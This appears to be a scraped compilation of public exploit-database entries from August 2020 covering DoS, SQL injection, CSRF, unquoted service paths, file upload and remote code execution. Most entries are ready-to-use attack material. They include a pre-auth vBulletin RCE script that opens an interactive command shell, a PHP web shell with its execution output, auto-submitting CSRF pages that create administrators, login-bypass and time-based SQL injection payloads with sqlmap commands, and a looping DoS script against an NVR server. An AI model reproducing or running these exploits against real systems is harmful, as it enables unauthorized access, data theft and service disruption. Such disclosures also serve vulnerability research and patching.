ISHACK AI BOT

# Exploit Title: Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2020-08-03 # Vendor Homepage: https://apps.apple.com/us/app/telnet-lite/id286893976 # Software Link: App Store for iOS devices # Tested Version: 4.2 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 7 iOS 13.5.1 # Steps to Produce the Crash: # 1.- Run python code: Mocha_Telnet_Lite_for_iOS_4.2.py # 2.- Copy content to clipboard # 3.- Open "Mocha Telnet Lite for iOS" # 4.- Configure # 5.- Clic New ... Add a configuration # 6.- IP Address > "192.168.1.1" # 7.- Paste ClipBoard on "User" # 8.- Password > "l4m5" # 9.- Clic Back # 10.- Click Back # 11.- Connect # 12.- Crashed #!/usr/bin/env python buffer = "\x41" * 350 print (buffer)

# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection # Exploit Author: Daniel Ortiz # Date: 2020-08-01 # Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html # Tested on: XAMPP Version 5.6.40 / Windows 10 # Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html import sys import requests import urllib3 import re import time urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning) def make_request(url, payload): p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"} s = requests.Session() r = s.post(url, data=payload, proxies=p) return r if __name__ == '__main__': if len(sys.argv) != 2: print("[*] Daily Expenses Management System | username SQL injection") print("[*] usage: %s TARGET" % sys.argv[0]) print("[*] e.g: %s 192.168.0.10" % sys.argv[0]) sys.exit(-1) TARGET = sys.argv[1] LOGIN_FORM = "http://%s/dets/" % TARGET # Step 1 - Bypass login form url = LOGIN_FORM p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'} r = make_request(url, p1) print("[+] Endpoint: %s") % LOGIN_FORM print("[+] Making requests with payload: %s") % p1 if re.findall('Dashboard', r.text): print("[+] Target vulnerable") else: print("[-] Error !!!")

# Exploit Title: RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC) # Author: Luis Martinez # Discovery Date: 2020-08-03 # Vendor Homepage: https://appadvice.com/app/rtsp-viewer/1056996189 # Software Link: App Store for iOS devices # Tested Version: 1.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 7 iOS 13.5.1 # Steps to Produce the Crash: # 1.- Run python code: RTSP_Viewer_for_iOS_1.0.py # 2.- Copy content to clipboard # 3.- Open "RTSP Viewer for iOS" # 4.- Touch the screen # 5.- Clic add (+) # 6.- Name > "l4m5" # 7.- Paste ClipBoard on "IP Address" # 8.- Clic Back # 9.- Message save is successed > OK # 10.- Click created connection (AAAA...) # 11.- Crashed #!/usr/bin/env python buffer = "\x41" * 450 print (buffer)

# Exploit Title: QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2020-08-03 # Vendor Homepage: https://www.qlik.com # Software Link: https://www.qlik.com/us/trial/qlik-sense-business # Tested Version: 12.50.20000.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code: QlikView_12.50.20000.0.py # 2.- Open QlikView_12.50.20000.0.txt and copy content to clipboard # 3.- Open "QlikView 12" # 4.- File -> "Open FTP ..." # 5.- Paste ClipBoard on "FTP Server Address" # 6.- Connect # 7.- Crashed #!/usr/bin/env python buffer = "\x41" * 300 f = open ("QlikView_12.50.20000.0.txt", "w") f.write(buffer) f.close()

# Exploit Title: ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC) # # Date: 2020-08-04 # # Exploit Author: MegaMagnus # # Vendor Homepage: https://www.acti.com/ # # Software Link: https://www.acti.com/DownloadCenter # # Version: V.3.0.12.42 , V.2.3.04.07 # # Tested on: Windows 7, Windows 10 # # CVE: CVE-2020-15956 # # This is a Proof of Concept Exploit, Please use responsibly. # ################################################################################# #!/usr/bin/env python import requests from requests.auth import HTTPBasicAuth import sys def product_info(server): try: r = requests.get(sys.argv[1] + '/media/Product/getProductInfo', timeout=10) if r.status_code == 200: print(r.text) return True except Exception as e: print(e) return False if __name__ == "__main__": if len(sys.argv) != 2: print("usage: cve-2020-15956.py <target>") exit(-1) if product_info(sys.argv[1]): print("Starting DOS. Use Ctrl-C (SIGINT) to stop!") while True: try: payload = b"\x00" * (760) r = requests.get(sys.argv[1] + '/Media/UserGroup/login', auth=HTTPBasicAuth('Basic',payload), timeout=10) print(r.status_code) except KeyboardInterrupt: pass except Exception as e: pass

# Exploit Title: Victor CMS 1.0 - 'Search' SQL Injection # Date: 2020-08-04 # Exploit Author: Edo Maland # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: XAMPP / Windows 10 ------------------------------------------------------------------------------------------------------------------------------------- # Discription: # The Victor CMS v1.0 application is vulnerable to SQL injection via the 'search' parameter on the search.php page. # Feature: Search # Vulnerable file: search.php # Vulnerable parameter : - search # PoC Url : http://example.com/CMSsite/search.php Methode : Post (search="[SQLi]"&submit) Payload : 1337'union+select+1,2,version(),database(),5,6,7,8,9,10 -- - # Burpsuite Requests POST /CMSsite/search.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Origin: http://example.com Connection: close Referer: http://example.com/CMSsite/search.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 search=1337'union+select+1,2,version(),databases(),5,6,7,8,9,10%20--%20-&submit= # Sqlmap Command sqlmap -u "http://example.com/CMSsite/search.php" --data="search=1337*&submit=" --dbs --random-agent -v 3

# Exploit Title: Stock Management System 1.0 - Authentication Bypass # Exploit Author: Adeeb Shah (@hyd3sec) # Date: August 1, 2020 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html # Version: 1.0 # Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 # Vulnerable Source Code if($_POST) { $username = $_POST['username']; $password = $_POST['password']; if(empty($username) || empty($password)) { if($username == "") { $errors[] = "Username is required"; } if($password == "") { $errors[] = "Password is required"; } } else { $sql = "SELECT * FROM users WHERE username = '$username'"; $result = $connect->query($sql); if($result->num_rows == 1) { $password = md5($password); // exists $mainSql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; $mainResult = $connect->query($mainSql); if($mainResult->num_rows == 1) { $value = $mainResult->fetch_assoc(); $user_id = $value['user_id']; // set session $_SESSION['userId'] = $user_id; header('location: http://localhost/stock/dashboard.php'); } else{ $errors[] = "Incorrect username/password combination"; } // /else } else { $errors[] = "Username doesnot exists"; } // /else } // /else not empty username // password } // /if $_POST ?> # Malicious POST Request to https://TARGET/stock/index.php HTTP/1.1 POST /stock/index.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.222.132/stock/ Content-Type: application/x-www-form-urlencoded Content-Length: 47 DNT: 1 Connection: close Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s Upgrade-Insecure-Requests: 1 email='+or+1%3d1+--+admin&password=badPass

# Exploit Title: CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2020-08-05 # Vendor Homepage: https://www.wibu.com/us/products/codemeter/runtime.html # Tested Version: 6.60 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """ CodeMeter Runtime Server CodeMeter.exe C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe Auto # Service info: C:\>sc qc CodeMeter.exe [SC] QueryServiceConfig SUCCESS SERVICE_NAME: CodeMeter.exe TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : CodeMeter Runtime Server DEPENDENCIES : Tcpip : Winmgmt SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection # Date: 2020-08-05 # Exploit Author: Edo Maland # Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html # Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html # Version: 1.0 # Tested on: XAMPP / Windows 10 ------------------------------------------------------------------------------------------------------------------------------------- # Feature: Add Expenses # Vulnerable file: add-expense.php # Vulnerable parameter : - item - costitem # PoC Url : http://example.com/dets/add-expense.php Methode : Post # Burpsuite Requests POST /dets/add-expense.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 138 Origin: http://example.com Connection: close Referer: http://example.com/dets/add-expense.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit= # Payload Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit= # Sqlmap Command sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3 ------------------------------------------------------------------------------------------------------------------------------------- # Feature: Edit Profile # Vulnerable file: user-profile.php # Vulnerable parameter : - fullname # PoC Url : http://example.com/dets/user-profile.php Methode : Post # Burpsuite Requests POST /dets/user-profile.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 189 Origin: http://example.com Connection: close Referer: http://example.com/dets/user-profile.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit= # Payload Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&[email protected]&contactnumber=1337173137&regdate=2020-08-05 13:49:51&submit= # Sqlmap Command sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs ------------------------------------------------------------------------------------------------------------------------------------- # Feature: Expense Reports # Vulnerable file: - expense-monthwise-reports-detailed.php - expense-datewise-reports.php - expense-yearwise-reports.php # Vulnerable parameter : - fromdate - todate # PoC Url : http://example.com/dets/expense-monthwise-reports-detailed.php Methode : Post # Burpsuite Requests POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://example.com Connection: close Referer: http://example.com/dets/expense-yearwise-reports.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit= # Payload Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit= # Sqlmap Command sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" --dbs ------------------------------------------------------------------------------------------------------------------------------------- # Feature: Login Page # Bypass Login Using SQLi on Admin/Member # Vulnerable file: index.php # PoC URL : https://example.com/dets/index.php Logging in with following details: - Payload : "' OR 1=1 -- '"@sql.id # Burp Requests POST /dets/index.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 50 Origin: http://example.com Connection: close Referer: http://example.com/dets/index.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 email="' OR 1=1 -- '"@sql.id&password=1337&login=login

# Exploit Title: All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin) # Discovery by: LiquidWorm # Discovery Date: 2020-08-05 # Vendor Homepage: https://www.all-dynamics.de <!DOCTYPE html> <!-- All-Dynamics Software enlogic:show Digital Signage System 2.0.2 CSRF Add Admin Vendor: All-Dynamics Software GmbH Product web page: https://www.all-dynamics.de Affected version: 2.0.2 (Build 2098) ILP32W 0/1/3/1597919619 Summary: Bring communication with your customers, guests or employees to a new level. You can design content individually and uncomplicated centrally and simply present it in different locations. Whether on large displays, steles, digital signs or on a projector, with enlogic:show your content will appear on the selected display in a calendar-controlled and precise manner. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5577.php Tested on: enlogic:show server Microsoft Windows Server 2019 Microsoft Windows Server 2016 Microsoft Windows Server 2012 Microsoft Windows 10 GNU/Linux Apache PHP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5576 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5576.php 21.07.2020 --> <html> <body onload="runcsrf()"> <h2>Grants the user the global administrative right. Administrative users are no longer under the control of the rights structure.</h2> <h1>Global: Superior rolebased rights.</h1> <form name="saveuser" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame0"> <input type="hidden" name="SAVECMD" value="usr&#95;generic" /> <input type="hidden" name="NEWUSER" value="1" /> <input type="hidden" name="USERNAME" value="Intruder" /> <input type="hidden" name="USERFULLNAME" value="ZSL" /> <input type="hidden" name="USERTAGS" value="tags" /> <input type="hidden" name="USEREMAIL" value="csrf&#64;zsl&#46;be" /> <input type="hidden" name="USERPHONE" value="333&#45;222&#45;1111" /> <input type="hidden" name="PWEXPIRE" value="0" /> <input type="hidden" name="NEWPW1" value="Pa$$w0rd!" /> <input type="hidden" name="NEWPW2" value="Pa$$w0rd!" /> <input type="hidden" name="USERLANG" value="en" /> <input type="hidden" name="STARTSCREEN" value="display&#46;calendar" /> <input type="hidden" name="USERCUSTIMEOUT" value="20" /> </form> <form name="addadmin" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame1"> <input type="hidden" name="SAVECMD" value="usr&#95;rights" /> <input type="hidden" name="SYSFLAGS&#91;&#93;" value="TYPE&#95;SYSADMIN" /> </form> <iframe name="frame0"></iframe> <iframe name="frame1"></iframe> <script> function runcsrf() { document.saveuser.submit(); document.addadmin.submit(); } </script> </body> </html>

# Exploit Title: Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password) # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-08-09 # Vendor Homepage: https://oswapp.com # Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # CWE-352: Cross-Site Request Forgery (CSRF) # CVSS Base Score: 7.5 # Impact Subscore: 5.9 # Exploitability Subscore: 1.6 # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in 'edit_user.php' webpage of OSWAPP's # Warehouuse Inventory System v1.0 allows remote attackers to change the admins password # via authenticated admin visiting a third-party site. <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST"> <input type="hidden" name="password" value="Boku123!" /> <input type="hidden" name="update&#45;pass" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: ManageEngine ADSelfService Plus 6000 – Unauthenticated Remote Code Execution # Date: 2020-08-08 # Exploit Author: Bhadresh Patel # Vendor link: https://www.manageengine.com/company.html # Version: ADSelfService Plus build < 6003 # CVE : CVE-2020-11552 This is an article with PoC exploit video of ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution Vulnerability ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Title: ==== ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution Vulnerability CVE ID: ======= CVE-2020-11552 Date: ==== 08/08/2020 (dd/mm/yyyy) Vendor: ====== As the IT management division of Zoho Corporation, ManageEngine prioritizes flexible solutions that work for all businesses, regardless of size or budget. ManageEngine crafts comprehensive IT management software with a focus on making your job easier. Our 90+ products and free tools cover everything your IT needs, at prices you can afford. From network and device management to security and service desk software, we're bringing IT together for an integrated, overarching approach to optimize your IT. Vendor link: https://www.manageengine.com/company.html Vulnerable Product: ============== ManageEngine ADSelfService Plus is an integrated self-service password management and single sign on solution. This solution helps domain users perform self-service password reset, self-service account unlock, employee self-update of personal details (e.g., mobile numbers and photos) in Microsoft Windows Active Directory. ADSelfService Plus also provides users with secure, one-click access to all SAML-supported enterprise applications, including Office 365, Salesforce, and G Suite, through Active Directory-based single sign-on (SSO). For improved security, ADSelfService Plus offers Windows two-factor authentication for all remote and local logins. Administrators find it easy to automate password resets, account unlocks while optimizing IT expenses associated with help desk calls. Product link: https://www.manageengine.com/products/self-service-password/?meadsol Abstract: ======= A remote code execution vulnerability exists in ManageEngine ADSelfService Plus Software when it does not properly enforce user privileges associated with Windows Certificate Dialog. This vulnerability could allow an unauthenticated attacker to remotely execute commands with system level privileges on target windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability. Report-Timeline: ============= 27/02/2020: Vendor notified 27/02/2020: Vendor response 28/02/2020: Marked duplicate 11/03/2020: Patch released 23/03/2020: Vendor responded regarding patch release update 26/03/2020: Patch tested and found that it partially fixed the issue. Reported back to the vendor. 18/04/2020: Shared updated report with new PoC 22/04/2020: Vendor acknowledged the issue 24/07/2020: Patch released ( https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6003-release-faceid-support ) 08/08/2020: Public disclosure Affected Software Version: ============= < ADSelfService Plus build 6003 Exploitation-Technique: =================== Remote Severity Rating (CVSS): =================== 9.8 (Critical) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) Details: ======= A remote code execution vulnerability exists in ManageEngine ADSelfService Plus Software when it does not properly enforce user privileges associated with Windows Certificate Dialog. This vulnerability could allow an unauthenticated attacker to remotely execute commands with system level privileges on target windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability. ManageEngine ADSelfService Plus thick client enables a user to perform self-service like password reset, self-service account unlock, etc by using self-service option on windows login screen. Upon selecting this option, ManageEngine ADSelfService Plus thick client software will be launched which will connect to a remote ADSelfServicePlus server to facilitate the self-service operations. A security alert can/will be triggered when “an unauthenticated attacker having physical access to the host issues a self-signed SSL certificate to the client”. Or, “a (default) self-signed SSL certificate is configured on ADSelfService Plus server”. “View Certificate” option from the security alert will allow an attacker with physical access or a remote attacker with RDP access, to export a displayed certificate to a file. This will further cascade to the standard dialog/wizard which will open file explorer as SYSTEM. By navigating file explorer through “C:\windows\system32\”, a cmd.exe can be launched as a SYSTEM. *PoC Video:* https://www.youtube.com/watch?v=slZRXffswnQ 01:00 to 05:30 : Setup the environment 05:30 to 06:34 : Exploitation Credits: ======= Bhadresh Patel ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Regards, -Bhadresh

# Exploit Title: BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path # Discovery Date: 2020-07-31 # Response from BarcodeOCR Support: 08/03/2020 # Exploit Author: Daniel Bertoni # Vendor Homepage: https://www.barcode-ocr.com/ # Version: 19.3.6 # Tested on: Windows Server 2016, Windows 10 # Find the Unquoted Service Path Vulnerability: C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ BarcodeOCR Auto BarcodeOCR C:\Program Files (x86)\BarcodeOCR\Service.exe # Service info: C:\sc qc CodeMeter.exe [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BarcodeOCR TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\BarcodeOCR\Service.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : BarcodeOCR DIPENDENZE : SERVICE_START_NAME : LocalSystem # Exploit: A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.

# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution # Date: 2020-08-09 # Exploit Author: @zenofex # Vendor Homepage: https://www.vbulletin.com/ # Software Link: None # Version: 5.4.5 through 5.6.2 # Tested on: vBulletin 5.6.2 on Ubuntu 19.04 # CVE : None # vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code # execution vulnerability caused by incomplete patching of the previous # "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth # request to execute PHP code on a target vBulletin forum. #More info can be found at: #https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ #!/usr/bin/env python3 # vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex import argparse import requests import sys def run_exploit(vb_loc, shell_cmd): post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd} r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data) return r.text ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE') ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.') ARGS = ap.parse_args() while True: try: cmd = input("vBulletin5$ ") print(run_exploit(ARGS.location, cmd)) except KeyboardInterrupt: sys.exit("\nClosing shell...") except Exception as e: sys.exit(str(e))

# Exploit Title: Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) # Google Dork: - # Date: 2020-08-01 # Exploit Author: Roel van Beurden # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.7.zip # Version: 1.4.7 # Tested on: Linux Ubuntu 18.04 # CVE: CVE-2020-17463 1. Description: ---------------------- Fuel CMS 1.4.7 allows SQL Injection via parameter 'col' in pages/items, permissions/items, navigation/items and logs/items Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from one of the affected pages with 'col' parameter and save it like fuel.req Then run SQLmap to extract the data from the database: sqlmap -r fuel.req --risk=3 --level=5 --dbs --random-agent 3. Example payload: ---------------------- (time-based blind) /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 4. Burpsuite request: ---------------------- GET /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location%20AND%20(SELECT%201340%20FROM%20(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: ci_session=2pvc8gmus9he9fbesp3lkhlbc7oal188; fuel_eeed351bf4de904070ff77c1aef15576=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_eeed351bf4de904070ff77c1aef15576=%2528%257Bleftnav_h3%253A%25220%257C0%257C0%257C0%2522%252C%2520fuel_permissions_items%253A%2522list%2522%252C%2520fuel_pages_items%253A%2522list%2522%252C%2520leftnav_hide%253A%25220%2522%252C%2520tabs_ms_assets_create%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a63773d3d%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a637939305a584e30%253A%25220%2522%252C%2520tabs_ms_assets_create_615731685a32567a%253A%25220%2522%252C%2520fuel_navigation_items%253A%2522list%2522%257D%2529 Upgrade-Insecure-Requests: 1 5. Timeline: ---------------------- 2020-08-01: SQLi vulnerability found in Fuel CMS 1.4.7 2020-08-02: Reported vulnerability to vendor 2020-08-11: Vendor has patched the SQLi vulnerability in version 1.4.8

# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) # Google Dork: - # Date: 2020-07-29 # Exploit Author: Roel van Beurden # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip # Version: 2.2.14 # Tested on: Linux Ubuntu 18.04 # CVE: N/A 1. Description: ---------------------- CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution. 2. Proof of Concept: ---------------------- - Create .phtml or .ptar file with malicious PHP payload; - Upload .phtml or .ptar file in the 'File Manager' module; - Click on the uploaded file to perform remote code execution. 3: Example payload: ---------------------- <?php system($_GET['cmd']);?> 4a: Burp request: ---------------------- GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1 Host: 10.10.10.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: d2f3b04a992e92af78d4f451813df40fa6f4f4b4=2c462b984c95aa0a8d18f59e2dd21defb7d7e368%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiUm9lbCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCQ4NS5qSy5nTTMxZmJEQmlGTXlIYlQuUUR5eFRDekpsSVFncjhOS1FMbDhBSUlIUjVYeVNJZSJ9; __c=e9ef732e78dc5a9f603; CMSSESSIDde72be53c754=71mvdcppeeunddtap69k26ia4v Upgrade-Insecure-Requests: 1 4b: Burp response: ---------------------- HTTP/1.1 200 OK Date: Thu, 30 Jul 2020 23:14:47 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 54 Connection: close Content-Type: text/html; charset=UTF-8 uid=33(www-data) gid=33(www-data) groups=33(www-data)

